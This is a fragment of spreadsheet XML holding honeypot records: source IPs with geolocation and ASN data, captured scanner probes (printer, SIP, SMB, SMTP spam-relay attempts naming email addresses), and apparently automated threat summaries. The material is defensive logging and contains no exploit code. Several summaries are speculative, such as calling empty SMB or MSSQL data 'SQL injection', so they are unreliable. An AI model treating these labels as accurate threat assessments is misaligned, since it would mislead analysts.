'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.4.48.242:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.221,27130)}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.234.67.80:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=4234'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.255.123.181:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 149.102.153.168:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=15596'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=34612'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.60.224.106:443', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8ddd</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit various network services, including vulnerable devices and unsecured ports. They are likely using automated tools to brute-force passwords and gain unauthorized access. &amp;&amp; An unknown host is attempting to access the system's root directory via a secure connection, indicating potential reconnaissance or exploitation activity.
The request does not specify any particular resource, suggesting it may be probing for vulnerabilities.
This behavior can be indicative of a scanning activity to identify potential entry points. &amp;&amp; Possible malicious activity is an attempted connection to a secure server from an unknown host, possibly for reconnaissance or exploitation purposes. The request is made over HTTPS and the Accept header is set to '*' which allows for arbitrary content types to be accepted. This could be part of a larger attack chain.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; SQL Injection &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>78ccc76d48b774bcaf2f922d2f9c85b0</t>
  </si>
  <si>
    <t>122.151.3.108</t>
  </si>
  <si>
    <t>108.3.151.122.sta.wbroadband.net.au&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;41820&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>OC</t>
  </si>
  <si>
    <t>Oceania</t>
  </si>
  <si>
    <t>AU</t>
  </si>
  <si>
    <t>Australia</t>
  </si>
  <si>
    <t>WA</t>
  </si>
  <si>
    <t>Western Australia</t>
  </si>
  <si>
    <t>Perth</t>
  </si>
  <si>
    <t>2063523</t>
  </si>
  <si>
    <t>6001</t>
  </si>
  <si>
    <t>-31.9514</t>
  </si>
  <si>
    <t>115.862</t>
  </si>
  <si>
    <t>9443</t>
  </si>
  <si>
    <t>VOCUS PTY LTD</t>
  </si>
  <si>
    <t>Vocus</t>
  </si>
  <si>
    <t>::ffff:7a97:36c</t>
  </si>
  <si>
    <t>There is insufficient information provided to analyze any activity, as the log data field is empty (NA).</t>
  </si>
  <si>
    <t>051adde89bde286e79c356b44a641d99</t>
  </si>
  <si>
    <t>165.154.252.51</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>25&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']</t>
  </si>
  <si>
    <t>Greater London</t>
  </si>
  <si>
    <t>London</t>
  </si>
  <si>
    <t>2643743</t>
  </si>
  <si>
    <t>W1B</t>
  </si>
  <si>
    <t>51.5072</t>
  </si>
  <si>
    <t>-0.127586</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 8 Apr 2025 16:09:20 +0100_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;adamsrichard@comcast.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;adamrichard8888@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ustreasurydepartment@iname.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;icpcorgg@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;gullivers42@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:a59a:fc33</t>
  </si>
  <si>
    <t>31520bfa2786f24fcf66a774967babf6</t>
  </si>
  <si>
    <t>193.105.134.40</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_FTP_H4&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_REDIS_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;6379&amp;&amp;13962&amp;&amp;NA&amp;&amp;55186&amp;&amp;37331&amp;&amp;50402</t>
  </si>
  <si>
    <t>SE</t>
  </si>
  <si>
    <t>Sweden</t>
  </si>
  <si>
    <t>AB</t>
  </si>
  <si>
    <t>Stockholm</t>
  </si>
  <si>
    <t>Stockholm Municipality</t>
  </si>
  <si>
    <t>Stockholm (Kista)</t>
  </si>
  <si>
    <t>2673730</t>
  </si>
  <si>
    <t>164 00</t>
  </si>
  <si>
    <t>59.4016</t>
  </si>
  <si>
    <t>17.9455</t>
  </si>
  <si>
    <t>42237</t>
  </si>
  <si>
    <t>w1n ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}</t>
  </si>
  <si>
    <t>::ffff:c169:8628</t>
  </si>
  <si>
    <t>Unknown FTP activity detected, possibly an attempt to access or connect to the service.
This could be a port scan or reconnaissance by a potential attacker.
It may indicate a malicious actor probing for vulnerabilities. &amp;&amp; This indicates an FTP login attempt with the username "anonymous", suggesting a brute-force or unauthorized access attempt. 
The attacker is trying to initiate an FTP session without proper authentication. 
This could be a precursor to further malicious activity such as file transfer or system compromise. &amp;&amp; The attacker is attempting to use an anonymous username for FTP access, which could be a precursor to unauthorized data transfer or exploitation of the system. This may indicate a brute-force attack on the FTP service or a reconnaissance phase by the attacker. The goal might be to gain unauthorized access or to establish a foothold in the network. &amp;&amp; A user is attempting to login anonymously via FTP, which could be an indication of malicious activity as it may be used for unauthorized access or scanning. The attempt suggests a brute-force attack on the FTP service by trying common usernames like 'anonymous'. This behavior can be considered suspicious. &amp;&amp; The attacker is attempting to log in as an anonymous user, which is often a precursor to malicious activity such as file transfer or exploitation of vulnerabilities. This behavior suggests the attacker may be trying to access the system without proper authentication. The goal appears to be unauthorized access and potential data theft. &amp;&amp; This log suggests an attempt to access Redis service but was unsuccessful as indicated by 'NA' which typically means "not available" or "no result". This could be indicative of reconnaissance activity where an attacker is probing for exposed services. The lack of success implies the service might not have been properly configured or exposed.</t>
  </si>
  <si>
    <t>SQL Inject</t>
  </si>
  <si>
    <t>90b82d2b704f6bfa2f2614e6e8a7f504</t>
  </si>
  <si>
    <t>152.166.247.102</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H16</t>
  </si>
  <si>
    <t>687&amp;&amp;445&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>DO</t>
  </si>
  <si>
    <t>Dominican Republic</t>
  </si>
  <si>
    <t>01</t>
  </si>
  <si>
    <t>Nacional</t>
  </si>
  <si>
    <t>Santo Domingo De Guzmán</t>
  </si>
  <si>
    <t>Santo Domingo (Bella Vista)</t>
  </si>
  <si>
    <t>3492908</t>
  </si>
  <si>
    <t>10111</t>
  </si>
  <si>
    <t>18.4505</t>
  </si>
  <si>
    <t>-69.9517</t>
  </si>
  <si>
    <t>28118</t>
  </si>
  <si>
    <t>ALTICE DOMINICANA S.A.</t>
  </si>
  <si>
    <t>Altice Dominicana S.A.</t>
  </si>
  <si>
    <t>Altice Dominicana S.A</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,53004)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,53104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,17737)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,43257)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,54734)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,54761)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,59759)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,23375)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,59940)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,63823)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,58293)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,59896)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,49536)}&amp;&amp;{Data_SMB:Incoming connection (152.166.247.102,27277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:98a6:f766</t>
  </si>
  <si>
    <t>Possible attempt to exploit a SQL injection vulnerability, likely targeting database credentials or injecting malicious SQL code to extract sensitive information or gain unauthorized access. The "NA" value suggests an absence of actual SQL query data being sent, which could be a probing activity before the actual attack is launched. This behavior may indicate reconnaissance for potential future exploitation.</t>
  </si>
  <si>
    <t>eea93df2b9e7903834cd8a8ea5637fc4</t>
  </si>
  <si>
    <t>85.96.207.228</t>
  </si>
  <si>
    <t>abuseipdb&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>NA&amp;&amp;23</t>
  </si>
  <si>
    <t>TR</t>
  </si>
  <si>
    <t>Turkey</t>
  </si>
  <si>
    <t>34</t>
  </si>
  <si>
    <t>Istanbul</t>
  </si>
  <si>
    <t>Kadıköy</t>
  </si>
  <si>
    <t>Kızıltoprak</t>
  </si>
  <si>
    <t>742935</t>
  </si>
  <si>
    <t>40.9802</t>
  </si>
  <si>
    <t>29.042</t>
  </si>
  <si>
    <t>47331</t>
  </si>
  <si>
    <t>TTNet A.S.</t>
  </si>
  <si>
    <t>TurkTelecom</t>
  </si>
  <si>
    <t>Turk Telekomunikasyon A.S</t>
  </si>
  <si>
    <t>2004-09-20</t>
  </si>
  <si>
    <t>::ffff:5560:cfe4</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. &amp;&amp; No data provided, cannot analyze.</t>
  </si>
  <si>
    <t>87c6778e038b6c1f8af1a3b0af4103bb</t>
  </si>
  <si>
    <t>117.233.206.232</t>
  </si>
  <si>
    <t>New Delhi (Connaught Lane)</t>
  </si>
  <si>
    <t>28.6306</t>
  </si>
  <si>
    <t>77.2239</t>
  </si>
  <si>
    <t>::ffff:75e9:cee8</t>
  </si>
  <si>
    <t>c903d87908e7d879a28ec5d4dea6eb5c</t>
  </si>
  <si>
    <t>87.236.176.63</t>
  </si>
  <si>
    <t>enviable.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_SSH_H8&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_SOCKS5_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;26103&amp;&amp;1080&amp;&amp;5432&amp;&amp;6379&amp;&amp;22&amp;&amp;22&amp;&amp;26061&amp;&amp;NA&amp;&amp;6667&amp;&amp;9100&amp;&amp;389&amp;&amp;143&amp;&amp;1433&amp;&amp;1521&amp;&amp;443&amp;&amp;110&amp;&amp;25&amp;&amp;23&amp;&amp;3306&amp;&amp;445&amp;&amp;80&amp;&amp;3389&amp;&amp;45881&amp;&amp;21&amp;&amp;55913&amp;&amp;33191</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;login&amp;&amp;query&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.63,38429)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.63,33101)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.116.162:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'tvjboihs', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.63;tag=tvjboihs', 'max-forwards': '0', 'to': 'sip:66.94.127.183', 'via': 'SIP/2.0/UDP 87.236.176.63:5060;branch=z9hG4bKtvjboihs;received=87.236.176.63;rport=52583'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': 'l x0b         '}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 66.94.127.183:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:57ec:b03f</t>
  </si>
  <si>
    <t>The data suggests that there was an attempted connection to the TELNET service, but no further action occurred as it resulted in "No Action" taken. This could indicate a probe or reconnaissance attempt by malicious actors. The lack of any subsequent activity may also suggest that the actor lost interest or encountered difficulties. &amp;&amp; The data suggests an attempt to connect to a Redis service, which is likely a scanning or probing activity to exploit potential vulnerabilities. The fact that no data is being sent (indicated by Data_REDIS: NA) implies the attacker may be trying to fingerprint the system for further exploitation. This could be indicative of reconnaissance before launching a more sophisticated attack.</t>
  </si>
  <si>
    <t>602f9b6f4bfee65e78dd75076687a45b</t>
  </si>
  <si>
    <t>101.109.205.154</t>
  </si>
  <si>
    <t>node-14m2.pool-101-109.dynamic.totinternet.net&amp;&amp;node-14m2.pool-101-109.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>Lak Si</t>
  </si>
  <si>
    <t>Khwaeng Thung Song Hong</t>
  </si>
  <si>
    <t>1613187</t>
  </si>
  <si>
    <t>13.8983</t>
  </si>
  <si>
    <t>100.582</t>
  </si>
  <si>
    <t>2010-12-13</t>
  </si>
  <si>
    <t>TOT-AS-AP</t>
  </si>
  <si>
    <t>::ffff:656d:cd9a</t>
  </si>
  <si>
    <t>6078899315e68715df6d72a2ede5f061</t>
  </si>
  <si>
    <t>117.251.181.145</t>
  </si>
  <si>
    <t>Nib</t>
  </si>
  <si>
    <t>::ffff:75fb:b591</t>
  </si>
  <si>
    <t>152b1f543f5993e2e3a40b0af4396668</t>
  </si>
  <si>
    <t>120.62.81.119</t>
  </si>
  <si>
    <t>::ffff:783e:5177</t>
  </si>
  <si>
    <t>cfb1313b39c6569d98d66a873ad5460c</t>
  </si>
  <si>
    <t>202.170.204.227</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>5900&amp;&amp;10312&amp;&amp;1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>1270642</t>
  </si>
  <si>
    <t>Railtel</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,51502)}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,52119)}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,61251)}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,61405)}</t>
  </si>
  <si>
    <t>::ffff:caaa:cce3</t>
  </si>
  <si>
    <t>No connection attempted to MySQL service, suggesting no malicious activity related to this specific service at this time. 
There was an attempt but it failed or timed out as indicated by 'NA' which stands for Not Available.
This may be due to firewall configuration, host blocking or simply no data available from the database. &amp;&amp; The data suggests an attempt to exploit Microsoft SQL Server, likely for unauthorized database access or injection of malicious code. This could be part of a larger attack targeting sensitive data or systems. The goal is probably to gain unauthorized access or control over the targeted system.</t>
  </si>
  <si>
    <t>845a39cb87d9c6d8fa324e9783e4b098</t>
  </si>
  <si>
    <t>120.56.88.56</t>
  </si>
  <si>
    <t>New Delhi (Janpath)</t>
  </si>
  <si>
    <t>28.6296</t>
  </si>
  <si>
    <t>77.2183</t>
  </si>
  <si>
    <t>::ffff:7838:5838</t>
  </si>
  <si>
    <t>6d389b202a4eb6aa47bec959b2b0965a</t>
  </si>
  <si>
    <t>152.59.170.147</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>3306</t>
  </si>
  <si>
    <t>{'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>Bihar</t>
  </si>
  <si>
    <t>Begusarai</t>
  </si>
  <si>
    <t>1276609</t>
  </si>
  <si>
    <t>25.4185</t>
  </si>
  <si>
    <t>86.1339</t>
  </si>
  <si>
    <t>55836</t>
  </si>
  <si>
    <t>Reliance Jio Infocomm Limited</t>
  </si>
  <si>
    <t>RELIANCEJIO</t>
  </si>
  <si>
    <t>1994-08-08</t>
  </si>
  <si>
    <t>RELIANCEJIO-IN</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:983b:aa93</t>
  </si>
  <si>
    <t>386d3751019099248a56ebcdb13ef0b0</t>
  </si>
  <si>
    <t>185.247.137.105</t>
  </si>
  <si>
    <t>sharp.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
